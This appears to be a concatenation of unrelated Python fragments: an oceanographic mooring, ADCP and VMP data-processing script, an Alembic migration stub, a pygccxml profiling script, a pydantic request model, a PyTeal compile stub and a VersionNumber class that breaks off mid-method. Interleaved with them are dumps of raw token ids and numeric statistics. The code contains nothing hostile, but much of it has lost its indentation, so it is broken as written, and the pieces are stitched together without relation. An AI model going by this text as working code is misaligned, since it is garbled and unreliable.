# Initialised the arrays of windowed data for outer mooring
varro = ["z", "u", "v"]
for var in varro:
for m5w in moorings5w:
m5w[var] = np.zeros((nperseg, N_windows, 5))
var4o = ["z", "u", "v"]
for var in var4o:
for m4w in moorings4w:
m4w[var] = np.zeros((nperseg, N_windows, Nclevels))
# for var in var4o:
# for m4 in moorings4:
# m4[var] = np.zeros((N_windows, 4))
# Window the raw data.
for i in range(N_windows):
idx = idx0[i]
for var in varr:
c12w[var][:, i, :] = cc[var][idx : idx + nperseg, :]
for i in range(N_windows):
idx = idx0[i]
for var in varro:
for m5w, m in zip(moorings5w, moorings[1:]):
m5w[var][:, i, :] = m[var][idx : idx + nperseg, :]
c4["interp_far_flag"] = np.full_like(c4["u"], False, dtype=bool)
print("Interpolating properties.")
# Do the interpolation
for i in range(Nclevels):
# THIS hoffset is important!!!
c4["z"][:, i] = np.mean(c12w["z"][..., levis[i]], axis=(0, -1)) + hoffset[i]
for j in range(N_windows):
zr = c12w["z"][:, j, levis[i]]
ur = c12w["u"][:, j, levis[i]]
vr = c12w["v"][:, j, levis[i]]
gr = c12w["gamman"][:, j, levis[i]]
Sr = c12w["S"][:, j, levis[i]]
Tr = c12w["T"][:, j, levis[i]]
Pr = c12w["P"][:, j, levis[i]]
zi = c4["z"][j, i]
c4["interp_far_flag"][j, i] = np.any(np.min(np.abs(zr - zi), axis=-1) > zimax)
c4w["z"][:, j, i] = np.mean(zr, axis=-1)
c4w["t"][:, j, i] = c12w["t"][:, j, 0]
c4w["u"][:, j, i] = moo.interp_quantity(zr, ur, zi, pzu)
c4w["v"][:, j, i] = moo.interp_quantity(zr, vr, zi, pzv)
c4w["gamman"][:, j, i] = moo.interp_quantity(zr, gr, zi, pzg)
dudzr = np.gradient(ur, axis=-1) / np.gradient(zr, axis=-1)
dvdzr = np.gradient(vr, axis=-1) / np.gradient(zr, axis=-1)
dgdzr = np.gradient(gr, axis=-1) / np.gradient(zr, axis=-1)
N2 = seawater.bfrq(Sr.T, Tr.T, Pr.T, cc["lat"])[0].T
# Instead of mean, could moo.interp1d
c4w["dudz"][:, j, i] = np.mean(dudzr, axis=-1)
c4w["dvdz"][:, j, i] = np.mean(dvdzr, axis=-1)
c4w["dgdz"][:, j, i] = np.mean(dgdzr, axis=-1)
c4w["N2"][:, j, i] = np.mean(N2, axis=-1)
for m5w, m4w in zip(moorings5w, moorings4w):
if (m5w["id"] == "sw") & (
idx1[j] > sw_vel_nans
): # Skip this level because of NaNs
zr = m5w["z"][:, j, (0, 1, 3, 4)]
ur = m5w["u"][:, j, (0, 1, 3, 4)]
vr = m5w["v"][:, j, (0, 1, 3, 4)]
else:
zr = m5w["z"][:, j, :]
ur = m5w["u"][:, j, :]
vr = m5w["v"][:, j, :]
m4w["z"][:, j, i] = np.full((nperseg), zi)
m4w["u"][:, j, i] = moo.interp_quantity(zr, ur, zi, pzu)
m4w["v"][:, j, i] = moo.interp_quantity(zr, vr, zi, pzv)
print("Filtering windowed data.")
fcorcpd = np.abs(cc["f"]) * 86400 / pi2
Nmean = np.sqrt(np.average(c4w["N2"], weights=sig.hann(nperseg), axis=0))
varl = ["u", "v", "gamman"]
for var in varl:
c4w[var + "_hib"] = np.zeros_like(c4w[var])
c4w[var + "_lo"] = utils.butter_filter(
c4w[var], 24 / tc_hrs, fs=N_per_day, btype="low", axis=0
)
c4w[var + "_hi"] = c4w[var] - c4w[var + "_lo"]
for i in range(Nclevels):
for j in range(N_windows):
Nmean_ = Nmean[j, i] * 86400 / pi2
for var in varl:
c4w[var + "_hib"][:, j, i] = utils.butter_filter(
c4w[var][:, j, i],
(filtlo * fcorcpd, filthi * Nmean_),
fs=N_per_day,
btype="band",
)
varl = ["u", "v"]
for var in varl:
for m4w in moorings4w:
m4w[var + "_lo"] = utils.butter_filter(
m4w[var], 24 / tc_hrs, fs=N_per_day, btype="low", axis=0
)
m4w[var + "_hi"] = m4w[var] - m4w[var + "_lo"]
c4w["zi"] = np.ones_like(c4w["z"]) * c4["z"]
print("Calculating horizontal gradients.")
# Calculate horizontal gradients
for j in range(N_windows):
ll = np.stack(
([m["lon"] for m in moorings[1:]], [m["lat"] for m in moorings[1:]]), axis=1
)
uv = np.stack(
(
[m4w["u_lo"][:, j, :] for m4w in moorings4w],
[m4w["v_lo"][:, j, :] for m4w in moorings4w],
),
axis=1,
)
dudx, dudy, dvdx, dvdy, vort, _ = moo.div_vort_4D(ll[:, 0], ll[:, 1], uv)
nstrain = dudx - dvdy
sstrain = dvdx + dudy
c4w["dudx"][:, j, :] = dudx
c4w["dudy"][:, j, :] = dudy
c4w["dvdx"][:, j, :] = dvdx
c4w["dvdy"][:, j, :] = dvdy
c4w["nstrain"][:, j, :] = nstrain
c4w["sstrain"][:, j, :] = sstrain
c4w["vort"][:, j, :] = vort
print("Calculating window averages.")
for var in var4 + ["u_lo", "v_lo", "gamman_lo"]:
if var == "z": # Keep z as modified by hoffset.
continue
c4[var] = np.average(c4w[var], weights=sig.hann(nperseg), axis=0)
print("Estimating w and b.")
om = np.fft.fftfreq(nperseg, 15 * 60)
c4w["w_hi"] = np.fft.ifft(
1j
* pi2
* om[:, np.newaxis, np.newaxis]
* np.fft.fft(-c4w["gamman_hi"] / c4["dgdz"], axis=0),
axis=0,
).real
c4w["w_hib"] = np.fft.ifft(
1j
* pi2
* om[:, np.newaxis, np.newaxis]
* np.fft.fft(-c4w["gamman_hib"] / c4["dgdz"], axis=0),
axis=0,
).real
# Estimate buoyancy variables
c4w["b_hi"] = -gsw.grav(-c4["z"], cc["lat"]) * c4w["gamman_hi"] / c4["gamman_lo"]
c4w["b_hib"] = -gsw.grav(-c4["z"], cc["lat"]) * c4w["gamman_hib"] / c4["gamman_lo"]
c4["N"] = np.sqrt(c4["N2"])
print("Estimating covariance spectra.")
freq, c4w["Puu"] = sig.welch(c4w["u_hi"], **spec_kwargs)
_, c4w["Pvv"] = sig.welch(c4w["v_hi"], **spec_kwargs)
_, c4w["Pww"] = sig.welch(c4w["w_hi"], **spec_kwargs)
_, c4w["Pwwg"] = sig.welch(c4w["gamman_hi"] / c4["dgdz"], **spec_kwargs)
c4w["Pwwg"] *= (pi2 * freq[:, np.newaxis, np.newaxis]) ** 2
_, c4w["Pbb"] = sig.welch(c4w["b_hi"], **spec_kwargs)
_, c4w["Cuv"] = sig.csd(c4w["u_hi"], c4w["v_hi"], **spec_kwargs)
_, c4w["Cuwg"] = sig.csd(c4w["u_hi"], c4w["gamman_hi"] / c4["dgdz"], **spec_kwargs)
c4w["Cuwg"] *= -1j * pi2 * freq[:, np.newaxis, np.newaxis]
_, c4w["Cvwg"] = sig.csd(c4w["v_hi"], c4w["gamman_hi"] / c4["dgdz"], **spec_kwargs)
c4w["Cvwg"] *= -1j * pi2 * freq[:, np.newaxis, np.newaxis]
_, c4w["Cub"] = sig.csd(c4w["u_hi"], c4w["b_hi"], **spec_kwargs)
_, c4w["Cvb"] = sig.csd(c4w["v_hi"], c4w["b_hi"], **spec_kwargs)
print("Estimating covariance matrices.")
c4["couu"] = cov(c4w["u_hib"], c4w["u_hib"], axis=0)
c4["covv"] = cov(c4w["v_hib"], c4w["v_hib"], axis=0)
c4["coww"] = cov(c4w["w_hib"], c4w["w_hib"], axis=0)
c4["cobb"] = cov(c4w["b_hib"], c4w["b_hib"], axis=0)
c4["couv"] = cov(c4w["u_hib"], c4w["v_hib"], axis=0)
c4["couw"] = cov(c4w["u_hib"], c4w["w_hib"], axis=0)
c4["covw"] = cov(c4w["v_hib"], c4w["w_hib"], axis=0)
c4["coub"] = cov(c4w["u_hib"], c4w["b_hib"], axis=0)
c4["covb"] = cov(c4w["v_hib"], c4w["b_hib"], axis=0)
c4w["freq"] = freq.copy()
# Get rid of annoying tiny values.
svarl = ["Puu", "Pvv", "Pbb", "Cuv", "Cub", "Cvb", "Pwwg", "Cuwg", "Cvwg"]
for var in svarl:
    c4w[var][0, ...] = 0.0
    # Use Nclevels (currently 4) instead of a hard-coded 4 so the array
    # shape tracks the number of interpolation levels.
    c4[var + "_int"] = np.full((N_windows, Nclevels), np.nan)
# Horizontal azimuth according to Jing 2018
c4w["theta"] = np.arctan2(2.0 * c4w["Cuv"].real, (c4w["Puu"] - c4w["Pvv"])) / 2
# Integration #############################################################
print("Integrating power spectra.")
for var in svarl:
c4w[var + "_cint"] = np.full_like(c4w[var], fill_value=np.nan)
fcor = np.abs(cc["f"]) / pi2
N_freq = len(freq)
freq_ = np.tile(freq[:, np.newaxis, np.newaxis], (1, N_windows, Nclevels))
ulim = fhi * np.tile(c4["N"][np.newaxis, ...], (N_freq, 1, 1)) / pi2
llim = fcor * flo
use = (freq_ < ulim) & (freq_ > llim)
svarl = ["Puu", "Pvv", "Pbb", "Cuv", "Pwwg"]
for var in svarl:
c4[var + "_int"] = igr.simps(use * c4w[var].real, freq, axis=0)
c4w[var + "_cint"] = igr.cumtrapz(use * c4w[var].real, freq, axis=0, initial=0.0)
# Change lower integration limits for vertical components...
llim = fcor * flov
use = (freq_ < ulim) & (freq_ > llim)
svarl = ["Cub", "Cvb", "Cuwg", "Cvwg"]
for var in svarl:
c4[var + "_int"] = igr.simps(use * c4w[var].real, freq, axis=0)
c4w[var + "_cint"] = igr.cumtrapz(use * c4w[var].real, freq, axis=0, initial=0.0)
# Ruddic and Joyce effective stress
for var1, var2 in zip(["Tuwg", "Tvwg"], ["Cuwg", "Cvwg"]):
func = use * c4w[var2].real * (1 - fcor ** 2 / freq_ ** 2)
nans = np.isnan(func)
func[nans] = 0.0
c4[var1 + "_int"] = igr.simps(func, freq, axis=0)
func = use * c4w[var2].real * (1 - fcor ** 2 / freq_ ** 2)
nans = np.isnan(func)
func[nans] = 0.0
c4w[var1 + "_cint"] = igr.cumtrapz(func, freq, axis=0, initial=0.0)
# Usefull quantities
c4["nstress"] = c4["Puu_int"] - c4["Pvv_int"]
c4["sstress"] = -2.0 * c4["Cuv_int"]
c4["F_horiz"] = (
-0.5 * (c4["Puu_int"] - c4["Pvv_int"]) * c4["nstrain"]
- c4["Cuv_int"] * c4["sstrain"]
)
c4["F_vert"] = (
-(c4["Cuwg_int"] - cc["f"] * c4["Cvb_int"] / c4["N"] ** 2) * c4["dudz"]
- (c4["Cvwg_int"] + cc["f"] * c4["Cub_int"] / c4["N"] ** 2) * c4["dvdz"]
)
c4["F_vert_alt"] = -c4["Tuwg_int"] * c4["dudz"] - c4["Tvwg_int"] * c4["dvdz"]
c4["F_total"] = c4["F_horiz"] + c4["F_vert"]
c4["EPu"] = c4["Cuwg_int"] - cc["f"] * c4["Cvb_int"] / c4["N"] ** 2
c4["EPv"] = c4["Cvwg_int"] + cc["f"] * c4["Cub_int"] / c4["N"] ** 2
##
c4["nstress_cov"] = c4["couu"] - c4["covv"]
c4["sstress_cov"] = -2.0 * c4["couv"]
c4["F_horiz_cov"] = (
-0.5 * (c4["couu"] - c4["covv"]) * c4["nstrain"] - c4["couv"] * c4["sstrain"]
)
c4["F_vert_cov"] = (
-(c4["couw"] - cc["f"] * c4["covb"] / c4["N"] ** 2) * c4["dudz"]
- (c4["covw"] + cc["f"] * c4["coub"] / c4["N"] ** 2) * c4["dvdz"]
)
c4["F_total_cov"] = c4["F_horiz_cov"] + c4["F_vert_cov"]
# %% [markdown]
# Estimate standard error on covariances.
# %%
bootnum = 1000
np.random.seed(12341555)
idxs = np.arange(nperseg, dtype="i2")
# def cov1(xy, axis=0):
# x = xy[..., -1]
# y = xy[..., -1]
# return np.mean((x - np.mean(x, axis=axis))*(y - np.mean(y, axis=axis)), axis=axis)
print("Estimating error on covariance using bootstrap (slow).")
euu_ = np.zeros((bootnum, N_windows, Nclevels))
evv_ = np.zeros((bootnum, N_windows, Nclevels))
eww_ = np.zeros((bootnum, N_windows, Nclevels))
ebb_ = np.zeros((bootnum, N_windows, Nclevels))
euv_ = np.zeros((bootnum, N_windows, Nclevels))
euw_ = np.zeros((bootnum, N_windows, Nclevels))
evw_ = np.zeros((bootnum, N_windows, Nclevels))
eub_ = np.zeros((bootnum, N_windows, Nclevels))
evb_ = np.zeros((bootnum, N_windows, Nclevels))
for i in range(bootnum):
idxs_ = np.random.choice(idxs, nperseg)
u_ = c4w["u_hib"][idxs_, ...]
v_ = c4w["v_hib"][idxs_, ...]
w_ = c4w["w_hib"][idxs_, ...]
b_ = c4w["b_hib"][idxs_, ...]
euu_[i, ...] = cov(u_, u_, axis=0)
evv_[i, ...] = cov(v_, v_, axis=0)
eww_[i, ...] = cov(w_, w_, axis=0)
ebb_[i, ...] = cov(b_, b_, axis=0)
euv_[i, ...] = cov(u_, v_, axis=0)
euw_[i, ...] = cov(u_, w_, axis=0)
evw_[i, ...] = cov(v_, w_, axis=0)
eub_[i, ...] = cov(u_, b_, axis=0)
evb_[i, ...] = cov(v_, b_, axis=0)
c4["euu"] = euu_.std(axis=0)
c4["evv"] = evv_.std(axis=0)
c4["eww"] = eww_.std(axis=0)
c4["ebb"] = ebb_.std(axis=0)
c4["euv"] = euv_.std(axis=0)
c4["euw"] = euw_.std(axis=0)
c4["evw"] = evw_.std(axis=0)
c4["eub"] = eub_.std(axis=0)
c4["evb"] = evb_.std(axis=0)
# %% [markdown]
# Error on gradients.
# %%
finite_diff_err = 0.06 # Assume 6 percent...
SNR_dudz = np.load("../data/SNR_dudz.npy")
SNR_dvdz = np.load("../data/SNR_dvdz.npy")
SNR_nstrain = np.load("../data/SNR_nstrain.npy")
SNR_sstrain = np.load("../data/SNR_sstrain.npy")
ones = np.ones_like(c4["euu"])
c4["edudz"] = ones * np.sqrt(c4["dudz"].var(axis=0) / SNR_dudz)
c4["edvdz"] = ones * np.sqrt(c4["dvdz"].var(axis=0) / SNR_dvdz)
c4["enstrain"] = esum(
ones * np.sqrt(c4["nstrain"].var(axis=0) / SNR_nstrain),
finite_diff_err * c4["nstrain"],
)
c4["esstrain"] = esum(
ones * np.sqrt(c4["sstrain"].var(axis=0) / SNR_sstrain),
finite_diff_err * c4["sstrain"],
)
# %% [markdown]
# Error propagation.
# %%
euumvv = 0.5 * esum(c4["euu"], c4["evv"])
c4["enstress"] = euumvv.copy()
enorm = emult(
-0.5 * (c4["Puu_int"] - c4["Pvv_int"]), c4["nstrain"], euumvv, c4["enstrain"]
)
eshear = emult(c4["Cuv_int"], c4["sstrain"], c4["euv"], c4["esstrain"])
c4["errF_horiz_norm"] = enorm.copy()
c4["errF_horiz_shear"] = eshear.copy()
c4["errF_horiz"] = esum(enorm, eshear)
euumvv = 0.5 * esum(c4["euu"], c4["evv"])
c4["enstress_cov"] = euumvv.copy()
enorm = emult(-0.5 * (c4["couu"] - c4["covv"]), c4["nstrain"], euumvv, c4["enstrain"])
eshear = emult(c4["couv"], c4["sstrain"], c4["euv"], c4["esstrain"])
c4["errF_horiz_norm_cov"] = enorm.copy()
c4["errF_horiz_shear_cov"] = eshear.copy()
c4["errF_horiz_cov"] = esum(enorm, eshear)
euwmvb = esum(c4["euw"], np.abs(cc["f"] / c4["N"] ** 2) * c4["evb"])
evwpub = esum(c4["evw"], np.abs(cc["f"] / c4["N"] ** 2) * c4["eub"])
c4["evstressu"] = euwmvb
c4["evstressv"] = evwpub
edu = emult(
-(c4["Cuwg_int"] - cc["f"] * c4["Cvb_int"] / c4["N"] ** 2),
c4["dudz"],
euwmvb,
c4["edudz"],
)
edv = emult(
-(c4["Cvwg_int"] + cc["f"] * c4["Cub_int"] / c4["N"] ** 2),
c4["dvdz"],
evwpub,
c4["edvdz"],
)
c4["errEPu"] = edu.copy()
c4["errEPv"] = edv.copy()
c4["errF_vert"] = esum(edu, edv)
c4["errEPu_alt"] = emult(-c4["Tuwg_int"], c4["dudz"], c4["euw"], c4["edudz"])
c4["errEPv_alt"] = emult(-c4["Tvwg_int"], c4["dvdz"], c4["evw"], c4["edvdz"])
c4["errF_vert_alt"] = esum(c4["errEPu_alt"], c4["errEPv_alt"])
edu = emult(
-(c4["couw"] - cc["f"] * c4["covb"] / c4["N"] ** 2), c4["dudz"], euwmvb, c4["edudz"]
)
edv = emult(
-(c4["covw"] + cc["f"] * c4["coub"] / c4["N"] ** 2), c4["dvdz"], evwpub, c4["edvdz"]
)
c4["errEPu_cov"] = edu.copy()
c4["errEPv_cov"] = edv.copy()
c4["errF_vert_cov"] = esum(edu, edv)
c4["errF_total"] = esum(c4["errF_vert"], c4["errF_horiz"])
c4["errF_total_cov"] = esum(c4["errF_vert_cov"], c4["errF_horiz_cov"])
# %% [markdown]
# Save the interpolated data.
# %% ########################## SAVE CORRECTED FILES ##########################
io.savemat(os.path.join(data_out, "C_alt.mat"), c4)
io.savemat(os.path.join(data_out, "C_altw.mat"), c4w)
# %% [markdown]
# <a id="ADCP"></a>
# %% [markdown]
# # ADCP Processing
# %% ########################## PROCESS ADCP DATA #############################
# ---- ADCP section: load, shear, and low/high/band-pass filtering ----------
print("ADCP PROCESSING")
tf = np.array([16.0, 2.0])  # band pass filter cut off hours
tc_hrs = 40.0  # Low pass cut off (hours)
dt = 0.5  # Data sample period hr
print("Loading ADCP data from file.")
file = os.path.expanduser(os.path.join(data_in, "ladcp_data.mat"))
adcp = utils.loadmat(file)["ladcp2"]
print("Removing all NaN rows.")
varl = ["u", "v", "z"]
for var in varl:  # Get rid of the all nan row.
    adcp[var] = adcp.pop(var)[:-1, :]
print("Calculating vertical shear.")
z = adcp["z"]
# First differences along axis 0 give shear on the midpoint depth grid.
dudz = np.diff(adcp["u"], axis=0) / np.diff(z, axis=0)
dvdz = np.diff(adcp["v"], axis=0) / np.diff(z, axis=0)
# Mask any level where either component is missing so both stay aligned.
nans = np.isnan(dudz) | np.isnan(dvdz)
dudz[nans] = np.nan
dvdz[nans] = np.nan
adcp["zm"] = utils.mid(z, axis=0)
adcp["dudz"] = dudz
adcp["dvdz"] = dvdz
# Low pass filter data.
print("Low pass filtering at {:1.0f} hrs.".format(tc_hrs))
varl = ["u", "v", "dudz", "dvdz"]
for var in varl:
    data = adcp[var]
    nans = np.isnan(data)
    # Time-mean of each variable (per depth level).
    adcp[var + "_m"] = np.nanmean(data, axis=0)
    # Interpolate over gaps before filtering; sample rate is 1/dt per hour.
    datalo = utils.butter_filter(
        utils.interp_nans(adcp["dates"], data, axis=1), 1 / tc_hrs, 1 / dt, btype="low"
    )
    # Then put nans back...
    if nans.any():
        datalo[nans] = np.nan
    namelo = var + "_lo"
    adcp[namelo] = datalo
    namehi = var + "_hi"
    # High-passed signal is the residual after removing the low-passed part.
    adcp[namehi] = adcp[var] - adcp[namelo]
# Band pass filter the data.
print("Band pass filtering between {:1.0f} and {:1.0f} hrs.".format(*tf))
varl = ["u", "v", "dudz", "dvdz"]
for var in varl:
    data = adcp[var]
    nans = np.isnan(data)
    databp = utils.butter_filter(
        utils.interp_nans(adcp["dates"], data, axis=1), 1 / tf, 1 / dt, btype="band"
    )
    # Then put nans back...
    if nans.any():
        databp[nans] = np.nan
    namebp = var + "_bp"
    adcp[namebp] = databp
io.savemat(os.path.join(data_out, "ADCP.mat"), adcp)
# %% [markdown]
# <a id="VMP"></a>
# %% [markdown]
# ## VMP data
# %%
# ---- VMP section: subset profiles near the mooring, regrid, and save -------
print("VMP PROCESSING")
vmp = utils.loadmat(os.path.join(data_in, "jc054_vmp_cleaned.mat"))["d"]
# Polygon vertices (lon, lat) bounding the region of interest; points below
# are assembled as (startlon, startlat) pairs to match.
box = np.array([[-58.0, -58.0, -57.7, -57.7], [-56.15, -55.9, -55.9, -56.15]]).T
p = path.Path(box)
in_box = p.contains_points(np.vstack((vmp["startlon"], vmp["startlat"])).T)
idxs = np.argwhere(in_box).squeeze()
Np = len(idxs)
print("Isolate profiles in match around mooring.")
for var in vmp:
    ndim = np.ndim(vmp[var])
    # 2-D arrays are indexed (depth, profile); length-36 vectors appear to be
    # per-profile metadata (36 matching the source file's profile count — confirm).
    if ndim == 2:
        vmp[var] = vmp[var][:, idxs]
    if ndim == 1 and vmp[var].size == 36:
        vmp[var] = vmp[var][idxs]
print("Rename variables.")
vmp["P"] = vmp.pop("press")
vmp["T"] = vmp.pop("temp")
vmp["S"] = vmp.pop("salin")
print("Deal with profiles where P[0] != 1.")
# Reference 1-dbar pressure grid used to locate each profile's valid span.
P_ = np.arange(1.0, 10000.0)
i0o = np.zeros((Np), dtype=int)  # first valid index in the original profile
i1o = np.zeros((Np), dtype=int)  # last valid index in the original profile
i0n = np.zeros((Np), dtype=int)  # first index on the new pressure grid
i1n = np.zeros((Np), dtype=int)  # last index on the new pressure grid
pmax = 0.0
for i in range(Np):
    nans = np.isnan(vmp["eps"][:, i])
    i0o[i] = i0 = np.where(~nans)[0][0]
    i1o[i] = i1 = np.where(~nans)[0][-1]
    P0 = vmp["P"][i0, i]
    P1 = vmp["P"][i1, i]
    i0n[i] = np.searchsorted(P_, P0)
    i1n[i] = np.searchsorted(P_, P1)
    pmax = max(P1, pmax)
# Common pressure grid for all retained profiles, padded past the deepest one.
P = np.tile(np.arange(1.0, pmax + 2)[:, np.newaxis], (1, len(idxs)))
eps = np.full_like(P, np.nan)
chi = np.full_like(P, np.nan)
T = np.full_like(P, np.nan)
S = np.full_like(P, np.nan)
for i in range(Np):
    # Copy each profile's valid span onto the common grid, NaN elsewhere.
    eps[i0n[i] : i1n[i] + 1, i] = vmp["eps"][i0o[i] : i1o[i] + 1, i]
    chi[i0n[i] : i1n[i] + 1, i] = vmp["chi"][i0o[i] : i1o[i] + 1, i]
    T[i0n[i] : i1n[i] + 1, i] = vmp["T"][i0o[i] : i1o[i] + 1, i]
    S[i0n[i] : i1n[i] + 1, i] = vmp["S"][i0o[i] : i1o[i] + 1, i]
vmp["P"] = P
vmp["eps"] = eps
vmp["chi"] = chi
vmp["T"] = T
vmp["S"] = S
vmp["z"] = gsw.z_from_p(vmp["P"], vmp["startlat"])
print("Calculate neutral density.")
# Compute potential temperature using the 1983 UNESCO EOS.
vmp["PT0"] = seawater.ptmp(vmp["S"], vmp["T"], vmp["P"])
# Flatten variables for analysis.
lons = np.ones_like(P) * vmp["startlon"]
lats = np.ones_like(P) * vmp["startlat"]
S_ = vmp["S"].flatten()
T_ = vmp["PT0"].flatten()
P_ = vmp["P"].flatten()
LO_ = lons.flatten()
LA_ = lats.flatten()
gamman = gamma_GP_from_SP_pt(S_, T_, P_, LO_, LA_)
# Offset by 1000 to express neutral density in kg/m^3-like units.
vmp["gamman"] = np.reshape(gamman, vmp["P"].shape) + 1000.0
io.savemat(os.path.join(data_out, "VMP.mat"), vmp)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
17,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
43313,
685,
4102,
2902,
60,
198,
2,
1303,
10854,
262,
8246,
285,
2675,
278,
1366,
198,
2,
198,
2,
26714,
25,... | 2.015024 | 23,563 |
"""add verification_roles table
Revision ID: 4fc3ae9ba717
Revises: 215e9036a3d7
Create Date: 2020-07-05 20:08:18.197783
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4fc3ae9ba717'
down_revision = '215e9036a3d7'
# No named branches and no dependencies on other migration heads.
branch_labels = None
depends_on = None
| [
37811,
2860,
19637,
62,
305,
829,
3084,
198,
198,
18009,
1166,
4522,
25,
604,
16072,
18,
3609,
24,
7012,
22,
1558,
198,
18009,
2696,
25,
22951,
68,
3829,
2623,
64,
18,
67,
22,
198,
16447,
7536,
25,
12131,
12,
2998,
12,
2713,
1160,
... | 2.492063 | 126 |
# Copyright 2014-2017 Insight Software Consortium.
# Copyright 2004-2009 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0.
# See http://www.boost.org/LICENSE_1_0.txt
import os
import sys
import time
import hotshot
import hotshot.stats
# Absolute directory containing this module; anchors the sys.path additions.
this_module_dir_path = os.path.abspath(
    os.path.dirname(sys.modules[__name__].__file__))
# Prepend the grandparent and parent directories so the in-tree pygccxml and
# the test helpers are importable ahead of any installed copies.
sys.path.insert(1, os.path.join(this_module_dir_path, '../../'))
sys.path.insert(2, os.path.join(this_module_dir_path, '../'))
import autoconfig  # nopep8
from pygccxml import parser  # nopep8
from pygccxml import declarations  # nopep8
# Remove any existing declarations cache so the profile measures a cold parse.
dcache_file_name = os.path.join(autoconfig.data_directory, 'pygccxml.cache')
if os.path.exists(dcache_file_name):
    os.remove(dcache_file_name)
#########################################################################
# testing include_std.hpp
#########################################################################
# testing include_std.hpp
if __name__ == "__main__":
    # Alternative benchmarks, kept for manual runs:
    # test_on_windows_dot_h()
    # test_source_on_include_std_dot_hpp()
    # test_project_on_include_std_dot_hpp()
    print('running')
    # Profile one parse of a large GCC-XML output file into 'parser.prof'.
    # NOTE(review): hotshot is a Python 2-only profiler, and test_on_big_file
    # is not defined in this excerpt — presumably declared earlier; confirm.
    prof = hotshot.Profile('parser.prof')
    prof.runcall(lambda: test_on_big_file('itkImage.xml', 1))
    stats = hotshot.stats.load("parser.prof")
    # Sort by internal time, then by call count, and show the top 30 entries.
    stats.sort_stats('time', 'calls')
    stats.print_stats(30)
    print('running - done')
    # print 'loading file'
    # pdata = pstats.Stats('pygccxml.profile')
    # print 'loading file - done'
    # print 'striping dirs'
    # pdata.strip_dirs()
    # print 'striping dirs - done'
    # print 'sorting stats'
    # pdata.sort_stats('time').print_stats(476)
    # print 'sorting stats - done'
    # pdata.print_callers('find_all_declarations')
| [
2,
15069,
1946,
12,
5539,
39917,
10442,
42727,
13,
198,
2,
15069,
5472,
12,
10531,
7993,
30254,
16206,
7204,
13,
198,
2,
4307,
6169,
739,
262,
19835,
10442,
13789,
11,
10628,
352,
13,
15,
13,
198,
2,
4091,
2638,
1378,
2503,
13,
3952... | 2.752 | 625 |
import pytest
from matplotlib import pyplot as plt
from matplotlib.axes import Axes
from sklearn.linear_model import LinearRegression, LogisticRegression
from ml_tooling import Model
from ml_tooling.data import load_demo_dataset
from ml_tooling.plots.viz import RegressionVisualize, ClassificationVisualize
from ml_tooling.result import Result
| [
11748,
12972,
9288,
198,
6738,
2603,
29487,
8019,
1330,
12972,
29487,
355,
458,
83,
198,
6738,
2603,
29487,
8019,
13,
897,
274,
1330,
12176,
274,
198,
6738,
1341,
35720,
13,
29127,
62,
19849,
1330,
44800,
8081,
2234,
11,
5972,
2569,
808... | 3.46 | 100 |
from typing import Optional
from pydantic import Field, conint
from pystratis.api import Model
from pystratis.core.types import uint256
# noinspection PyUnresolvedReferences
class GetTxOutRequest(Model):
    """A request model for the node/gettxout endpoint.
    Args:
        trxid (uint256): The trxid to check.
        vout (conint(ge=0)): The vout.
        include_mempool (bool, optional): Include mempool in check. Default=True.
    """
    # Transaction id (hash) of the transaction to inspect.
    trxid: uint256
    # Index of the output within the transaction; constrained to be >= 0.
    vout: conint(ge=0) = Field(default=0)
    # Whether unconfirmed mempool transactions count toward the lookup;
    # serialized under the alias 'includeMemPool'.
    include_mempool: Optional[bool] = Field(default=True, alias='includeMemPool')
| [
6738,
19720,
1330,
32233,
198,
6738,
279,
5173,
5109,
1330,
7663,
11,
369,
600,
198,
6738,
12972,
2536,
37749,
13,
15042,
1330,
9104,
198,
6738,
12972,
2536,
37749,
13,
7295,
13,
19199,
1330,
20398,
11645,
628,
198,
2,
645,
1040,
14978,... | 2.747664 | 214 |
import sys
from pyteal import *
if __name__ == "__main__":
    # First CLI argument parameterizes the contract expression.
    arg = int(sys.argv[1])
    # Compile to TEAL v3 in signature (logic-signature) mode and print it.
    # NOTE(review): contract_account is not defined in this excerpt —
    # presumably defined earlier in the module; confirm.
    print(compileTeal(contract_account(arg), Mode.Signature, version=3))
| [
11748,
25064,
198,
6738,
12972,
660,
282,
1330,
1635,
628,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
1822,
796,
493,
7,
17597,
13,
853,
85,
58,
16,
12962,
198,
220,
220,
220,
3601,
7,
5... | 2.53125 | 64 |
from typing import List, Pattern
import re
from matflow.exceptionpackage.MatFlowException import InternalException
class VersionNumber:
    """
    This class represents string expressions that are valid version numbers.

    A valid version number is "1" optionally followed by dot-separated
    positive integer components without leading zeros, e.g. "1", "1.2",
    "1.2.10".
    """

    # The validated version number string.
    __number: str

    def __init__(self, number: str):
        """Translates correct string expressions into VersionNumber objects

        Only works if the expression is correct. Otherwise, throws error.

        Args:
            number (str): The version number

        Raises:
            InternalException: If `number` is not a valid version number.
        """
        # Raw string literal: "\." in a plain string is an invalid escape
        # sequence (DeprecationWarning on modern Python).
        p: Pattern[str] = re.compile(r"1(\.[1-9][0-9]*)*")
        if not p.fullmatch(number):
            raise InternalException(
                "Internal Error: " + number + " isn't a valid version number."
            )
        self.__number = number

    # getter
    def get_number(self) -> str:
        """Gets the version number stored in this object.

        Returns:
            str: Version number
        """
        return self.__number

    # setter
    def set_number(self, number: str):
        """Sets the number attribute of the object.

        Note: unlike the constructor, this does not re-validate the input.

        Args:
            number (str): The new number that has to be a correct version number
        """
        self.__number = number

    # methods
    def get_dir_name(self) -> str:
        """Returns number with every '.' replaced by '_' to form a valid dir name.

        Returns:
            str: The dir name for the version
        """
        return self.__number.replace(".", "_")

    def get_predecessor(self):
        """Returns the version number without its final ".<int>" component.

        Raises exception if the current version is version 1.

        Returns:
            VersionNumber: The predecessor version number
        """
        if self.get_number() == "1":
            raise InternalException("Internal Error: Version '1' has no predecessor.")
        # rpartition splits on the last '.'; the head is the predecessor.
        predecessor_str, _, _ = self.get_number().rpartition(".")
        return VersionNumber(predecessor_str)

    def get_successor(self, existing_version_numbers: List[str]):
        """
        Builds the smallest subsequent version number that doesn't exist yet.

        Args:
            existing_version_numbers (List[str]): List of all existing version numbers.

        Returns:
            VersionNumber: The new subsequent version number
        """
        successor_postfix: int = 1
        while True:
